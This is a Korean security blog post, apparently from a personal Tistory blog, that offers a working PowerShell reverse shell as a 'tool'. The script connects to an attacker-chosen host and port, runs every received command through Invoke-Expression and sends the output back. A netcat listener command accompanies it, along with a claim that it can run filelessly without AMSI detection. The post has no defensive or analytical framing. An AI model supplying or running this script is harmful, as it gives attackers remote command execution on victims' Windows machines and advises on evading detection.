[tool] Powershell Reverse Shell

Security/system hacking

[tool] Powershell Reverse Shell

KimKwangWoon 2025. 2. 24. 21:01

reverse_shell.ps1

fileless로도 사용가능함(powershell에 동작되게 하면 AMSI 탐지 없이 실행 가능함)

$LHOST = "0.0.0.0"  	  # 공격자의 IP
$LPORT = 4444             # 공격자가 리스닝할 포트

$client = New-Object System.Net.Sockets.TCPClient($LHOST, $LPORT)
$stream = $client.GetStream()
$writer = New-Object System.IO.StreamWriter($stream)
$reader = New-Object System.IO.StreamReader($stream)

$writer.AutoFlush = $true
$sendBytes = [System.Text.Encoding]::ASCII.GetBytes("Connected`n")
$stream.Write($sendBytes, 0, $sendBytes.Length)

while ($true) {
    $cmd = $reader.ReadLine()
    if ($cmd -eq "exit") { break }
    $output = try { Invoke-Expression $cmd 2>&1 | Out-String } catch { $_.Exception.Message }
    $writer.WriteLine($output)
}

$writer.Close()
$reader.Close()
$stream.Close()
$client.Close()

nc command

nc -lnvp 4444

PoC

저작자표시 (새창열림)

'Security > system hacking' 카테고리의 다른 글

[Hook] MinHook 빌드 및 사용 방법 (0)	2025.05.14
[tool] All Process RWX Shellcode Execution (0)	2025.02.24
[tool] RWX Shellcode Execution (0)	2025.02.20
hackerschool ftz level9+bof 기본개념 (12)	2018.06.15

현재글[tool] Powershell Reverse Shell

Kilkat

Github: https://github.com/kilkat Linked In: https://www.linkedin.com/in/kilkat

파이썬, 리버싱, 코로나바이러스, 해커, 해킹문제, jango, dreamhack, reversing, 장고, 웹해킹, webhacking.kr문제풀이, 해킹, 파이썬웹, 장고vscode, 바이러스, web, 백준, djangovscode, Django, vscode,

Today :
Yesterday :

일	월	화	수	목	금	토
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29	30	31

Kilkat

[tool] Powershell Reverse Shell

'Security > system hacking' 카테고리의 다른 글

'Security/system hacking'의 다른글

티스토리툴바

[tool] Powershell Reverse Shell

'Security > system hacking' 카테고리의 다른 글

'Security/system hacking'의 다른글

관련글

티스토리툴바